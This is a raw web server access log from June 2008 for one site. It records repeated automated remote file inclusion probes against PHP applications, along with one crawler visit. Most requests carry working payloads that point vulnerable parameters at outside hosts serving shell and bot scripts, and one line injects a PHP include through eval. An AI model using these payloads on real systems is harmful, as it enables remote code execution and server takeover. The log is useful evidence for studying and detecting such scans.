77.79.246.200 - - [17/Jun/2008:09:00:11 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://r3mu.by.ru/Shells/phpcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:00:28 -0700] "GET /logs/access_080309.log/favorites.php?nuke_bb_root_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:00:39 -0700] "GET /logs/access_080309.log/favorites.php?nuke_bb_root_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:09:00:40 -0700] "GET /logs/access_080312.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:00:42 -0700] "GET /logs/access_080309.log/favorites.php?nuke_bb_root_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:09:01:20 -0700] "GET /logs//browse.php/header.php?prefix=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "dmulk.com"
151.11.24.250 - - [17/Jun/2008:09:01:22 -0700] "GET //browse.php/header.php?prefix=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "dmulk.com"
202.221.143.80 - - [17/Jun/2008:09:01:22 -0700] "GET /logs/access_080126.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://daryl12.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.221.143.80 - - [17/Jun/2008:09:01:22 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://daryl12.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:01:55 -0700] "GET /logs/access_071228.log/naboard_pnr.php?skin=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:01:55 -0700] "GET /naboard_pnr.php?skin=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:01:55 -0700] "GET /logs/naboard_pnr.php?skin=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:01:56 -0700] "GET /logs/access_080201.log/naboard_pnr.php?skin=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
202.221.143.80 - - [17/Jun/2008:09:02:11 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://daryl12.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:02:25 -0700] "GET /logs/access_080302.log/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:02:25 -0700] "GET /config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:02:25 -0700] "GET /logs/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:02:26 -0700] "GET /logs/access_080302.log/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:02:26 -0700] "GET /config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:02:26 -0700] "GET /logs/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:02:28 -0700] "GET /logs/access.log/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:02:29 -0700] "GET /logs/access.log/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:09:03:05 -0700] "GET //browse.php/header.php?prefix=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:09:03:06 -0700] "GET /logs//browse.php/header.php?prefix=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.178.227.81 - - [17/Jun/2008:09:03:56 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://flashvide0.com/secretagent/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
208.178.227.81 - - [17/Jun/2008:09:03:56 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://flashvide0.com/secretagent/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
59.106.19.69 - - [17/Jun/2008:09:04:04 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
59.106.19.69 - - [17/Jun/2008:09:04:04 -0700] "GET /logs/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:04:05 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:04:09 -0700] "GET //index.php?name=PNphpBB2&file=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:04:09 -0700] "GET /logs//index.php?name=PNphpBB2&file=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:04:12 -0700] "GET /logs/access_080302.log/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:04:13 -0700] "GET /config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:04:13 -0700] "GET /logs/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:04:16 -0700] "GET /logs/access.log/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:04:19 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:04:21 -0700] "GET //index.php?name=PNphpBB2&file=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:04:22 -0700] "GET /logs//index.php?name=PNphpBB2&file=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:04:46 -0700] "GET /logs/access_080229.log/anguage/lang_english/lang_main_album.php?phpbb_root_path=http://r3mu.by.ru/Shells/phpcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:04:47 -0700] "GET /logs/anguage/lang_english/lang_main_album.php?phpbb_root_path=http://r3mu.by.ru/Shells/phpcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:09:04:47 -0700] "GET /logs/index.php?redir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:09:04:51 -0700] "GET /index.php?redir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18423 "-" "libwww-perl/5.805" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:05:24 -0700] "GET /logs/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:05:24 -0700] "GET /config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:05:32 -0700] "GET /logs/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:05:33 -0700] "GET /config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
70.86.5.10 - - [17/Jun/2008:09:05:52 -0700] "GET /logs//errors.php?error=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.86.5.10 - - [17/Jun/2008:09:05:52 -0700] "GET //errors.php?error=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
65.55.211.31 - - [17/Jun/2008:09:06:46 -0700] "GET /?show=gallery&pageid=159 HTTP/1.1" 200 54301 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.30.73.117 - - [17/Jun/2008:09:07:27 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.km-rc.com//appserv/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.215.105 - - [17/Jun/2008:09:07:55 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.215.105 - - [17/Jun/2008:09:07:56 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.215.105 - - [17/Jun/2008:09:07:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.130.218 - - [17/Jun/2008:09:08:03 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://pmstudio.net/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
67.19.130.218 - - [17/Jun/2008:09:08:03 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://pmstudio.net/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
67.19.130.218 - - [17/Jun/2008:09:08:11 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://pmstudio.net/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "dmulk.com"
67.19.130.218 - - [17/Jun/2008:09:08:11 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://pmstudio.net/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "dmulk.com"
210.48.67.39 - - [17/Jun/2008:09:08:30 -0700] "GET /logs/access_071225.log//admin.php?include_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:09:08:31 -0700] "GET //admin.php?include_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:09:08:31 -0700] "GET /logs//admin.php?include_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:08:37 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://r3mu.by.ru/Shells/phpcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:08:37 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://icqbomber.110mb.com/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:08:37 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://r3mu.by.ru/Shells/phpcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:08:37 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://icqbomber.110mb.com/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:08:47 -0700] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://icqbomber.110mb.com/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:08:49 -0700] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://r3mu.by.ru/Shells/phpcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
90.158.114.6 - - [17/Jun/2008:09:09:58 -0700] "GET /logs/access_080106.log//admin.php?include_path=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [17/Jun/2008:09:09:59 -0700] "GET //admin.php?include_path=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [17/Jun/2008:09:09:59 -0700] "GET /logs//admin.php?include_path=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [17/Jun/2008:09:10:05 -0700] "GET /logs/access_080114.log//admin.php?include_path=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.221.64.26 - - [17/Jun/2008:09:10:11 -0700] "GET /logs/access_080312.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.221.64.26 - - [17/Jun/2008:09:10:11 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.221.64.26 - - [17/Jun/2008:09:10:12 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [17/Jun/2008:09:10:27 -0700] "GET /logs/access.log///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.km-rc.com//appserv/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [17/Jun/2008:09:10:28 -0700] "GET ///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.km-rc.com//appserv/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [17/Jun/2008:09:10:28 -0700] "GET /logs///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.km-rc.com//appserv/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.103.109 - - [17/Jun/2008:09:10:44 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://pmstudio.net/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.17.103.109 - - [17/Jun/2008:09:10:44 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://pmstudio.net/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
213.221.64.26 - - [17/Jun/2008:09:12:11 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:12:29 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:12:30 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:12:30 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:13:29 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.149.95.15 - - [17/Jun/2008:09:13:31 -0700] "GET /logs//board/skin/zero_vote/setup.php?dir=http://geocities.com/machinekill/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.95.15 - - [17/Jun/2008:09:13:31 -0700] "GET //board/skin/zero_vote/setup.php?dir=http://geocities.com/machinekill/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:13:49 -0700] "GET /logs/access_080302.log/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:13:49 -0700] "GET /config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:13:49 -0700] "GET /logs/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:13:51 -0700] "GET /logs/access.log/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
202.191.61.240 - - [17/Jun/2008:09:14:02 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.191.61.240 - - [17/Jun/2008:09:14:03 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:14:07 -0700] "GET /logs/access_080302.log/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:14:07 -0700] "GET /config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:14:07 -0700] "GET /logs/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:14:09 -0700] "GET /logs/access.log/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:09:14:22 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:09:14:58 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:09:14:58 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.215 - - [17/Jun/2008:09:15:43 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:15:44 -0700] "GET /logs/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:15:45 -0700] "GET /config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:11 -0700] "GET /logs/config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:11 -0700] "GET /config.inc.php?path_escape=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:16 -0700] "GET /logs/access_080308.log/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:16 -0700] "GET /logs/access_080308.log/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:16 -0700] "GET /main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:16 -0700] "GET /main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:16 -0700] "GET /logs/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:16 -0700] "GET /logs/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:19 -0700] "GET /logs/access_080313.log/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:19 -0700] "GET /main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:19 -0700] "GET /logs/access_080313.log/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:20 -0700] "GET /logs/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:20 -0700] "GET /main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:16:20 -0700] "GET /logs/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
